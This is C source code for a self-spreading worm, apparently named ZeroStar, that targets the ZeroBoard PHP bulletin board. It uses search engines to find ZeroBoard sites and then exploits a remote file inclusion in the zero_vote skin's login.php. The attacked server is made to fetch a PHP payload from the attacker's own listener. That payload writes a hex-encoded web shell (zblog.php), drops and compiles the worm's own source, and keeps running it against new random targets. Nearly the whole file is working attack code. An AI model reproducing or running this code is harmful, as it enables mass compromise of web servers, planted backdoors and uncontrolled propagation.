ZeroStar Worm- ZeroBoard Vulnerability Exploit

1. #include <stdio.h>
2. #include <unistd.h>
3. #include <stdlib.h>
4. #include <sys/socket.h>
5. #include <netdb.h>
6. #include <netinet/in.h>
7. #include <signal.h>
8. #include <sys/ioctl.h>
9. #include <net/if.h>
10. #ifdef __sun__
11. #include <sys/sockio.h>
12. #endif /* __SunOS__ */
13.  
14. #define DEBUG_ING
15. #undef DEBUG_ING
16.  
17. #define TMP_FILE "./tmp.core"
18. #define CMD_FILE "./cmd.core"
19. #define PRC_FILE "./proc.core"
20. #define SCS (0)
21. #define MIN (1)
22.  
23. #ifdef __linux__
24. #define DEF_ETH "eth0"
25. #else
26. #ifdef __FreeBSD__
27. #define DEF_ETH "ed0"
28. #else
29. #ifdef __sun__
30. #define DEF_ETH "hme0"
31. #endif
32. #endif
33. #endif
34.  
35. #define MAX_BUF (0x0000ffff)
36. #define FIR_BUF (0x00000800)
37. #define SEC_BUF (0x00000400)
38. #define THR_BUF (0x00000200)
39. #define MIN_BUF (0x00000100)
40.  
41. #define VENDOR "nzeo.com"
42.  
43. // search rule
44. #define FD_RULE_0 "/zboard/zboard.php"
45. #define FD_RULE_1 "/zb41/zboard.php"
46. #define FD_RULE_2 "/bbs/zboard.php"
47. #define FD_RULE_3 "/zb/zboard.php"
48. #define FD_RULE_4 "/zb40/zboard.php"
49. #define FD_RULE_5 "/board/zboard.php"
50. #define FD_RULE_6 "zboard.php"
51. #define FD_RULE_7 "zboard.ph"
52.  
53. // pattern
54. #define FD_PATH_0 "/zboard/skin/zero_vote/login.php"
55. #define FD_PATH_1 "/zb41/skin/zero_vote/login.php"
56. #define FD_PATH_2 "/bbs/skin/zero_vote/login.php"
57. #define FD_PATH_3 "/zb/skin/zero_vote/login.php"
58. #define FD_PATH_4 "/zb40/skin/zero_vote/login.php"
59. #define FD_PATH_5 "/board/skin/zero_vote/login.php"
60. #define FD_PATH_6 "/skin/zero_vote/login.php"
61.  
62. #define RESULT_OK "200 OK"
63. #define MAKE_STR1 "BACKDOOR MAKE SUCCESS"
64. #define MAKE_STR2 "ZBCODE MAKE SUCCESS"
65. #define DELT_STR1 "BACKDOOR DELETE SUCCESS"
66. #define DELT_STR2 "ZBCODE DELETE SUCCESS"
67.  
68. #define DEF_PORT (31337)
69. #define CONN_PORT (80)
70. #define DEF_TIME (20)
71.  
72. int set_sock(char *sc_gt_host,int port,int type);
73. void re_connt_lm(int st_sock_va,int type);
74. int proc_r();
75. void t_kill();
76. void sf_exit();
77. int g_ip(char *ip);
78. int make_cmd_file();
79. int filter_f(char *test_bf,int tnum);
80.  
81. int sock;
82.  
83. struct tg_rl
84. {
85.  int r_num;
86.  char *r_str;
87.  char *url_str;
88. };
89.  
90. #define TARGET_NUM (7)
91. #define SEARCH_NUM (4)
92.  
93. struct tg_rl __tg_rule_va[]=
94. {
95.  {0,FD_RULE_0,FD_PATH_0},
96.  {1,FD_RULE_1,FD_PATH_1},
97.  {2,FD_RULE_2,FD_PATH_2},
98.  {3,FD_RULE_3,FD_PATH_3},
99.  {4,FD_RULE_4,FD_PATH_4},
100.  {5,FD_RULE_5,FD_PATH_5},
101.  {6,FD_RULE_6,FD_PATH_6},
102.  {7,FD_RULE_7,FD_PATH_6},
103.  {8,NULL,NULL}
104. };
105.  
106. struct search_rule
107. {
108.  int num;
109.  u_char *url;
110.  int maxnum;
111.  int defnum;
112.  u_char *http_head;
113. };
114.  
115. struct search_rule search_va[]=
116. {
117.  {0,"www.google.com",990,10,"http://"},
118.  {1,"kr.search.yahoo.com",990,15,"http://"},
119.  {2,"search.nate.com",480,10,"http://"},
120.  {3,"search.lycos.com",990,10,"//"},
121.  {4,"kr.altavista.com",1000,10,"//"},
122.  {5,NULL,0,0,NULL}
123. };
124.  
125. void t_kill()
126. {
127. #ifdef DEBUG_ING
128.  fprintf(stdout,"time out\n");
129. #endif
130.  close(sock);
131.  sock=-1;
132.  signal(SIGALRM,SIG_DFL);
133.  return;
134. }
135.  
136. void sf_exit()
137. {
138. #ifdef DEBUG_ING
139.  fprintf(stdout,"safe exit\n");
140. #endif
141.  close(sock);
142.  kill((int)proc_r(),9);
143.  unlink(TMP_FILE);
144.  unlink(CMD_FILE);
145.  unlink(PRC_FILE);
146.  exit(-1);
147. }
148.  
149. int main(int argc,char *argv[])
150. {
151.  FILE *fp;
152.  
153.  int tnum=(SCS);
154.  int chk=(SCS);
155.  int gogo=(SCS);
156.  int whgl=(SCS);
157.  int qnum=(SCS);
158.  int tgrl_sl=(MIN);
159.  int _conn_num=(SCS);
160.  int port=(CONN_PORT);
161.  int def_port=(DEF_PORT);
162.  int sc_gt_sock;
163.  int host_chk=(SCS);
164.  
165.  u_char *gg_ptr=NULL;
166.  u_char *t_ptr=NULL;
167.  u_char __zr_bf[(MAX_BUF)];
168.  u_char *port_ptr=NULL;
169.  
170.  char pkt[(FIR_BUF)];
171.  char host[(SEC_BUF)];
172.  char url[(SEC_BUF)];
173.  char test_bf[(MAX_BUF)];
174.  char req_t_bf[(THR_BUF)];
175.  char ip[(MIN_BUF)];
176.  char atk_code[(MIN_BUF)];
177.  
178.  signal(SIGINT,sf_exit);
179.  signal(SIGTSTP,sf_exit);
180.  
181.  while((whgl=getopt(argc,argv,"S:s:T:t:Q:q:P:p:H:h:U:u:"))!=EOF)
182.  {
183.   extern char *optarg;
184.   switch(whgl)
185.   {
186.    case 'S':
187.    case 's':
188.     tnum=atoi(optarg);
189.     if(SEARCH_NUM<tnum)
190.     {
191.      fprintf(stderr,"target error\n");
192.      exit(-1);
193.     }
194.     break;
195.  
196.    case 'T':
197.    case 't':
198.     tgrl_sl=atoi(optarg);
199.     if(TARGET_NUM<tgrl_sl)
200.     {
201.      fprintf(stderr,"target error\n");
202.      exit(-1);
203.     }
204.     break;
205.  
206.    case 'Q':
207.    case 'q':
208.     qnum=atoi(optarg);
209.     break;
210.    
211.    case 'P':
212.    case 'p':
213.     def_port=atoi(optarg);
214.     break;
215.    
216.    case 'H':
217.    case 'h':
218.     memset((char *)host,0,sizeof(host));
219.     strncpy(host,optarg,sizeof(host)-1);
220.     host_chk++;
221.     break;
222.    
223.    case 'U':
224.    case 'u':
225.     memset((char *)url,0,sizeof(url));
226.     strncpy(url,optarg,sizeof(url)-1);
227.     host_chk++;
228.     break;
229.    
230.    default:
231.     exit(-1);
232.   }
233.  }
234.  
235.  (int)make_cmd_file();
236.  
237.  if(fork()==0)
238.  {
239.   signal(SIGALRM,SIG_IGN);
240.   for(whgl=0;whgl<argc;whgl++)
241.   {
242.    memset((char *)argv[whgl],0,strlen(argv[whgl]));
243.   }
244.   strcpy(argv[0],"receive mode process");
245.   if((fp=fopen(PRC_FILE,"w"))==NULL)
246.   {
247.    sf_exit();
248.   }
249.   fprintf(fp,"%d\n",getpid());
250.   fclose(fp);
251.   sc_gt_sock=(int)set_sock(NULL,def_port,1);
252.   (void)re_connt_lm(sc_gt_sock,0);
253.  }
254.  else
255.  {
256.   for(whgl=0;whgl<argc;whgl++)
257.   {
258.    memset((char *)argv[whgl],0,strlen(argv[whgl]));
259.   }
260.   strcpy(argv[0],"scanning mode process");
261.  
262.   switch(host_chk)
263.   {
264.    case 1:
265. #ifdef DEBUG_ING
266.     fprintf(stdout,"argument error\n");
267. #endif
268.     sf_exit();
269.     break;
270.    
271.    case 2:
272.     goto ok;
273.     break;
274.   }
275.  
276. #ifdef DEBUG_ING
277.   fprintf(stdout,"search url: %s\n",search_va[tnum].url);
278. #endif
279.   for(_conn_num=qnum; _conn_num< search_va[tnum].maxnum; _conn_num += (search_va[tnum].defnum))
280.   {
281. conn: if((sock=(int)set_sock(search_va[tnum].url,(CONN_PORT),0))==-1)
282.    {
283.     goto conn;
284.    }
285.  
286.    memset((char *)req_t_bf,0,sizeof(req_t_bf));
287.    switch(search_va[tnum].num)
288.    {
289.     case 0:
290.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
291.       "GET /search?q=%s"
292.       "&hl=ko&lr=&ie=UTF-8&start=%d&sa=N "
293.       "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
294.      break;
295.     case 1:
296.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
297.       "GET /search/web?p=%s&b=%d "
298.       "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
299.      break;
300.     case 2:
301.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
302.       "GET /webpage/search.asp?query=%s&start=%d "
303.       "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
304.      break;
305.     case 3:
306.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
307.       "GET /default.asp?query=%s&first=%d&pmore=more "
308.       "HTTP/1.0\r\n"
309.       "Accept-Language: ko\r\n"
310.       "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"
311.       "Host: %s\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);
312.      break;
313.     case 4:
314.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
315.       "GET /web/results?itag=wrx&q=%s&stq=%d "
316.       "HTTP/1.0\r\n"
317.       "Accept-Language: ko\r\n"
318.       "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"
319.       "Host: %s\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);
320.      break;
321.    }
322.    send(sock,req_t_bf,strlen(req_t_bf),0);
323.    whgl=(SCS);
324.  
325.    if((fp=fopen(TMP_FILE,"w"))==NULL)
326.    {
327.     return(-1);
328.    }
329.    signal(SIGALRM,SIG_IGN);
330.    alarm(MAX_BUF);
331.    
332.    memset((char *)test_bf,0,sizeof(test_bf));
333.    while(recv(sock,test_bf,sizeof(test_bf)-1,0))
334.    {
335.     fprintf(fp,"%s",test_bf);
336.     memset((char *)test_bf,0,sizeof(test_bf));
337.    }
338.    fclose(fp);
339.    close(sock);
340.  
341.    if((fp=fopen(TMP_FILE,"r"))==NULL)
342.    {
343.     return(-1);
344.    }
345.  
346.    while(fgets(__zr_bf,sizeof(__zr_bf)-1,fp))
347.    {
348.     gg_ptr=__zr_bf;
349.  
350.     while(MIN)
351.     {
352.      t_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head);
353.      gg_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
354.  
355.      if(t_ptr!=NULL)
356.      {
357.       memset((char *)test_bf,0,sizeof(test_bf));
358.       whgl=(SCS);
359.       chk=(SCS);
360.  
361.       for(gogo=0;gogo<strlen(t_ptr);gogo++)
362.       {
363.        if(chk)
364.        {
365.         if(t_ptr[gogo]=='>')
366.          chk=0;
367.        }
368.        else {
369.         if(t_ptr[gogo]==' ')
370.          continue;
371.         else if(t_ptr[gogo]=='<')
372.          chk=1;
373.         else test_bf[whgl++]=t_ptr[gogo];
374.        }
375.       }
376.  
377.       if(!strstr(test_bf,__tg_rule_va[tgrl_sl].r_str))
378.        continue;
379.       else t_ptr=(char *)strstr(test_bf,__tg_rule_va[tgrl_sl].r_str);
380.  
381.       if(t_ptr!=NULL)
382.        t_ptr[0]='\0';
383.       else continue;
384.  
385.       if(filter_f(test_bf,tnum))
386.       {
387.        t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
388.        if(strstr(t_ptr,search_va[tnum].http_head))
389.         continue;
390.  
391.        memset((char *)host,0,sizeof(host));
392.        memset((char *)url,0,sizeof(url));
393.  
394.        chk=(SCS);
395.  
396.        if(strstr(test_bf,search_va[tnum].http_head))
397.        {
398.         t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
399.         port=(CONN_PORT);
400.  
401.         for(whgl=0;whgl<strlen(t_ptr)+1;whgl++)
402.         {
403.          if(t_ptr[whgl]=='/')
404.          {
405.           for(gogo=0;whgl<strlen(t_ptr);whgl++)
406.            url[gogo++]=t_ptr[whgl];
407.           strcat(url,__tg_rule_va[tgrl_sl].url_str);
408.           break;
409.          }
410.          else if(t_ptr[whgl]=='\0')
411.          {
412.           strncpy(url,__tg_rule_va[tgrl_sl].url_str,sizeof(url)-1);
413.           break;
414.          }
415.          else if(t_ptr[whgl]==':')
416.          {
417.           port_ptr=(char *)strstr(t_ptr,":")+1;
418.           port=atoi(port_ptr);
419.          }
420.          else host[chk++]=t_ptr[whgl];
421.         }
422. #ifdef DEBUG_ING
423.         fprintf(stdout,"Total:%s,URL:%s,HOST:%s,PORT:%d\n",test_bf,url,host,port);
424. #endif
425. ok:
426.         sock=set_sock(host,port,0);
427.         if(sock==-1)
428.          continue;
429.         else {
430.          memset((char *)ip,0,sizeof(ip));
431.          memset((char *)atk_code,0,sizeof(atk_code));
432.          memset((char *)pkt,0,sizeof(pkt));
433.  
434.          (int)g_ip(ip);
435.          snprintf(atk_code,sizeof(atk_code)-1,"dir=http://%s:%d/\r\n",ip,def_port);
436.          snprintf(pkt,sizeof(pkt)-1,
437.           "POST http://%s%s HTTP/1.0\r\n"
438.           "Content-Type: application/x-www-form-urlencoded\r\n"
439.           "Content-Length: %d\r\n"
440.           "Host: %s\r\n\r\n%s\r\n",host,url,strlen(atk_code),host,atk_code);
441.          send(sock,pkt,strlen(pkt),0);
442.          memset((char *)pkt,0,sizeof(pkt));
443.          recv(sock,pkt,sizeof(pkt)-1,0);
444. #ifdef DEBUG_ING
445.          if(strstr(pkt,RESULT_OK))
446.          {
447.           if(strstr(pkt,MAKE_STR1))
448.            fprintf(stdout,"%s\n",MAKE_STR1);
449.           if(strstr(pkt,MAKE_STR2))
450.            fprintf(stdout,"%s\n",MAKE_STR2);
451.           if(strstr(pkt,DELT_STR1))
452.            fprintf(stdout,"%s\n",DELT_STR1);
453.           if(strstr(pkt,DELT_STR2))
454.            fprintf(stdout,"%s\n",DELT_STR2);
455.           printf("%s: %s\n",RESULT_OK,host);
456.          }
457. #endif
458.         }
459.         close(sock);
460.  
461.         if(host_chk)
462.         {
463.          sf_exit();
464.         }
465.        }
466.       }
467.      }
468.      else break;
469.     }
470.     memset((char *)__zr_bf,0,sizeof(__zr_bf));
471.    }
472.    fclose(fp);
473.    unlink(TMP_FILE);
474.   }
475.   sf_exit();
476.  }
477. }
478.  
479. int set_sock(char *sc_gt_host,int port,int type)
480. {
481.  struct sockaddr_in sock_st;
482.  struct sockaddr_in t_st;
483.  int nw_gt_sock,s_s;
484.  struct hostent *hst_etr;
485.  int sc_gt_sock;
486.  int t_c=0;
487.  char t_b[(SEC_BUF)];
488.  FILE *fp;
489.  char http_rq[]="HTTP/1.1 200 OK\r\n\r\n";
490.  
491.  if(!type){
492.   signal(SIGALRM,t_kill);
493.   alarm(DEF_TIME);
494.  
495.   if((hst_etr=gethostbyname(sc_gt_host))==NULL)
496.   {
497.    return(-1);
498.   }
499.   if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
500.   {
501.    return(-1);
502.   }
503.   sock_st.sin_family=(AF_INET);
504.   sock_st.sin_port=htons(port);
505.   sock_st.sin_addr=*((struct in_addr *)hst_etr->h_addr);
506.   memset(&(sock_st.sin_zero),0,8);
507.  
508.   if(connect(sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1)
509.   {
510.    close(sock);
511.    return(-1);
512.   }
513.   return(sock);
514.  }
515.  else{
516.   if((sc_gt_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
517.   {
518.    return(-1);
519.   }
520.  
521.   sock_st.sin_family=(AF_INET);
522.   sock_st.sin_port=htons(port);
523.   sock_st.sin_addr.s_addr=(INADDR_ANY);
524.   memset(&(sock_st.sin_zero),0,8);
525.  
526.   if(bind(sc_gt_sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1)
527.   {
528.    close(sc_gt_sock);
529.    return(-1);
530.   }
531. #define BK_LG 10
532.   if(listen(sc_gt_sock,(BK_LG))==-1){
533.    close(sc_gt_sock);
534.    return(-1);
535.   }
536.   while(1){
537.    s_s=sizeof(struct sockaddr_in);
538.    if((nw_gt_sock=accept(sc_gt_sock,(struct sockaddr *)&t_st,&s_s))==-1)
539.    {
540.     close(nw_gt_sock);
541.     close(sc_gt_sock);
542.     return(-1);
543.    }
544.    while(recv(nw_gt_sock,&t_c,1,0)){
545.     if(t_c==0x0d){
546.      recv(nw_gt_sock,&t_c,1,0);
547.      if(t_c==0x0a){
548.       recv(nw_gt_sock,&t_c,1,0);
549.       if(t_c==0x0d){
550.        recv(nw_gt_sock,&t_c,1,0);
551.        if(t_c==0x0a){
552.         break;
553.        }
554.       }
555.      }
556.     }
557.    }
558.  
559.    send(nw_gt_sock,http_rq,strlen(http_rq),0);
560.    if((fp=fopen(CMD_FILE,"r"))==NULL){
561.     close(nw_gt_sock);
562.     close(sc_gt_sock);
563.     return(-1);
564.    }
565.    memset((char *)t_b,0,sizeof(t_b));
566.    while(fgets(t_b,sizeof(t_b)-1,fp)){
567.     send(nw_gt_sock,t_b,strlen(t_b),0);
568.    }
569.    fclose(fp);
570.    close(nw_gt_sock);
571.    continue;
572.   }
573.   close(sc_gt_sock);
574.   return(-1);
575.  }
576. }
577.  
578. void re_connt_lm(int st_sock_va,int type)
579. {
580.  if(st_sock_va==-1)
581.  {
582.   if(!type){
583.    kill(getppid(),9); // parent
584.   }
585.   kill((int)proc_r(),9); // child
586.   sf_exit();
587.  }
588. }
589.  
590. int proc_r(){
591.  FILE *fp;
592.  int proc_n;
593.  if((fp=fopen(PRC_FILE,"r"))==NULL){
594.   exit(-1); // child check.
595.  }
596.  fscanf(fp,"%16d",&proc_n);
597.  fclose(fp);
598.  return proc_n;
599. }
600.  
601. int g_ip(char *ip)
602. {
603.  int sock;
604.  struct ifreq ifpq;
605.  struct sockaddr_in *pq;
606.  
607.  memset(&ifpq,0,sizeof(ifpq));
608.  if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
609.  {
610.   return(-1);
611.  }
612.  pq=(struct sockaddr_in *)&ifpq.ifr_addr;
613.  pq->sin_family=AF_INET;
614.  
615.  memcpy(ifpq.ifr_name,(DEF_ETH),sizeof(ifpq.ifr_name));
616.  if(ioctl(sock,SIOCGIFADDR,&ifpq)==0)
617.  {
618.   memset((char *)ip,0,(MIN_BUF));
619.   snprintf(ip,(MIN_BUF)-1,"%s",inet_ntoa(pq->sin_addr));
620.  }
621.  return 0;
622. }
623.  
624. #define BACKDOOR_PATH "zblog.php"
625. #define CODE_PATH "zbcode"
626. #define CODE_PATH_SRC "zbcode.c"
627.  
628. int make_cmd_file()
629. {
630.  unsigned long w1=0;
631.  FILE *fp;
632.  FILE *pf;
633.  
634.  if((fp=fopen(CMD_FILE,"w"))==NULL)
635.  {
636.   return(-1);
637.  }
638.  
639.  fprintf(fp,"<?\n"
640.   "chdir('../../');\n\n"
641.   "if(($fp=fopen('%s','r'))!=NULL)\n"
642.   "{\n"
643.   "$pnum=fread($fp,32);\n"
644.   "fclose($fp);\n"
645.   "$pnum=str_replace(\"\\n\",\"\",$pnum);\n"
646.   "if(($fp=fopen('/proc/'.$pnum.'/stat','r'))!=NULL)\n"
647.   "{\n"
648.   "exit;\n"
649.   "}\n"
650.   "}\n\n"
651.   "$cont=\"\\x3c\\x3f\\x0a\\x09\\x65\\x63\\x68\\x6f\\x20\\x27\\x3c\\x46\".\n"
652.   "\"\\x4f\\x52\\x4d\\x20\\x41\\x43\\x54\\x49\\x4f\\x4e\\x3d\\x24\".\n"
653.   "\"\\x50\\x48\\x50\\x5f\\x53\\x45\\x4c\\x46\\x20\\x4d\\x45\\x54\".\n"
654.   "\"\\x48\\x4f\\x44\\x3d\\x50\\x4f\\x53\\x54\\x3e\\x27\\x3b\\x0a\".\n"
655.   "\"\\x09\\x65\\x63\\x68\\x6f\\x20\\x27\\x3c\\x49\\x4e\\x50\\x55\".\n"
656.   "\"\\x54\\x20\\x54\\x59\\x50\\x45\\x3d\\x48\\x49\\x44\\x44\\x45\".\n"
657.   "\"\\x4e\\x20\\x4e\\x41\\x4d\\x45\\x3d\\x63\\x6d\\x64\\x20\\x56\".\n"
658.   "\"\\x41\\x4c\\x55\\x45\\x3d\\x24\\x63\\x6f\\x6d\\x6d\\x61\\x6e\".\n"
659.   "\"\\x64\\x3e\\x3c\\x2f\\x46\\x4f\\x52\\x4d\\x3e\\x3c\\x50\\x52\".\n"
660.   "\"\\x45\\x3e\\x27\\x3b\\x0a\\x09\\x24\\x63\\x6f\\x6d\\x6d\\x61\".\n"
661.   "\"\\x6e\\x64\\x3d\\x73\\x74\\x72\\x5f\\x72\\x65\\x70\\x6c\\x61\".\n"
662.   "\"\\x63\\x65\\x28\\x27\\x5c\\x5c\\x27\\x2c\\x27\\x27\\x2c\\x24\".\n"
663.   "\"\\x63\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x29\\x3b\\x0a\\x09\\x65\".\n"
664.   "\"\\x63\\x68\\x6f\\x20\\x60\\x24\\x63\\x6f\\x6d\\x6d\\x61\\x6e\".\n"
665.   "\"\\x64\\x60\\x3b\\x0a\\x3f\\x3e\\x0a\";\n\n"
666.   "$fp=fopen('%s','w');\n"
667.   "fputs($fp,$cont);\n"
668.   "fclose($fp);\n\n",PRC_FILE,BACKDOOR_PATH);
669.  
670.  if((pf=fopen(CODE_PATH,"r"))==NULL)
671.  {
672.   return(-1);
673.  }
674.  
675.  fprintf(fp,"$cont=\"");
676.  while(fread(&w1,1,1,pf))
677.  {
678.   fprintf(fp,"\\x%02x",w1);
679.  }
680.  fclose(pf);
681.  fprintf(fp,"\";\n\n");
682.  
683.  fprintf(fp,"$fp=fopen('%s','w');\n"
684.   "fputs($fp,$cont);\n"
685.   "fclose($fp);\n\n",CODE_PATH);
686.  if((pf=fopen(CODE_PATH_SRC,"r"))==NULL)
687.  {
688.   return(-1);
689.  }
690.  fprintf(fp,"$cont=\"");
691.  while(fread(&w1,1,1,pf))
692.  {
693.   fprintf(fp,"\\x%02x",w1);
694.  }
695.  fclose(pf);
696.  fprintf(fp,"\";\n\n");
697.  
698.  fprintf(fp,"$fp=fopen('%s','w');\n"
699.   "fputs($fp,$cont);\n"
700.   "fclose($fp);\n\n",CODE_PATH_SRC);
701.  fprintf(fp,"$RES=`gcc -o %s %s`;\n\n",CODE_PATH,CODE_PATH_SRC);
702.  
703.  fprintf(fp,"chmod('%s',0755);\n",CODE_PATH);
704.  
705.  fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL){\n",BACKDOOR_PATH);
706.  fprintf(fp,"echo \"%s\\n\";\n",MAKE_STR1);
707.  fprintf(fp,"} fclose($fp);\n\n");
708.  fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL){\n",CODE_PATH);
709.  fprintf(fp,"echo \"%s\\n\";\n",MAKE_STR2);
710.  fprintf(fp,"} fclose($fp);\n\n");
711.  
712. #if 1
713.  fprintf(fp,"$fnum=(rand()%%%d);\n",TARGET_NUM);
714.  fprintf(fp,"$snum=(rand()%%%d);\n",SEARCH_NUM);
715.  fprintf(fp,"$randnum=(rand()%400);\n");
716.  
717.  fprintf(fp,"while(1)\n{\n");
718.  fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL)\n"
719.   "{\n"
720.   "$pnum=fread($fp,32);\n"
721.   "fclose($fp);\n"
722.   "$pnum=str_replace(\"\\n\",\"\",$pnum);\n"
723.   "if(($fp=fopen('/proc/'.$pnum.'/stat','r'))!=NULL)\n"
724.   "{\n"
725.   "exit;\n"
726.   "}\n"
727.   "}\n\n",PRC_FILE);
728.  
729.  fprintf(fp,"$port=(rand()%%65500);\n");
730.  fprintf(fp,"if($port>1024){\n");
731.  fprintf(fp,"exec(\"./%s -t $fnum -p $port -s $snum -q $randnum\");\n",CODE_PATH);
732.  fprintf(fp,"}\n}\n");
733. #else
734.  fprintf(fp,"unlink('%s');\n",BACKDOOR_PATH);
735.  fprintf(fp,"unlink('%s');\n",CODE_PATH);
736.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH);
737.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1);
738.  fprintf(fp,"} else { fclose($fp);\n");
739.  fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",BACKDOOR_PATH,BACKDOOR_PATH);
740.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH);
741.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1);
742.  fprintf(fp,"}\n}\n");
743.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH);
744.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2);
745.  fprintf(fp,"} else { fclose($fp);\n");
746.  fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",CODE_PATH,CODE_PATH);
747.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH);
748.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2);
749.  fprintf(fp,"}\n}\n");
750. #endif
751.  fprintf(fp,"?>\n");
752.  fclose(fp);
753. }
754.  
755. int filter_f(char *test_bf,int tnum)
756. {
757.  switch(search_va[tnum].num)
758.  {
759.   case 0: /* google */
760.    if(!strstr(test_bf,"google")&&!strstr(test_bf,"/search?q=cache:")
761.     &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
762.     &&!strstr(test_bf,"%3F")&&!strstr(test_bf,"...")
763.     &&!strstr(test_bf,VENDOR))
764.    {
765.     return 1;
766.    }
767.    else return 0;
768.    break;
769.    
770.   case 1: /* yahoo */
771.    if(!strstr(test_bf,"yahoo")&&!strstr(test_bf,"/cache.php?")
772.     &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
773.     &&!strstr(test_bf,"search")&&!strstr(test_bf,".html%")
774.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
775.    {
776.     return 1;
777.    }
778.    else return 0;
779.    break;
780.    
781.   case 2: /* nate */
782.    if(!strstr(test_bf,"nate")&&!strstr(test_bf,"RESULT")
783.     &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
784.     &&!strstr(test_bf,"/search/")&&!strstr(test_bf,"%3F")
785.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
786.    {
787.     return 1;
788.    }
789.    else return 0;
790.    break;
791.    
792.   case 3: /* lycos */
793.    if(!strstr(test_bf,"lycos")&&!strstr(test_bf,"<")
794.     &&!strstr(test_bf,">")&&!strstr(test_bf,"%3F")
795.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
796.    {
797.     return 1;
798.    }
799.    else return 0;
800.    break;
801.    
802.   case 4: /* altavista */
803.    if(!strstr(test_bf,"ref_")&&!strstr(test_bf,"<")
804.     &&!strstr(test_bf,">")&&!strstr(test_bf,"%3f")
805.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
806.    {
807.     return 1;
808.    }
809.    else return 0;
810.    break;
811.    
812.   default:
813.    return 0;
814.    break;
815.  }
816.  return 0;
817. }
818.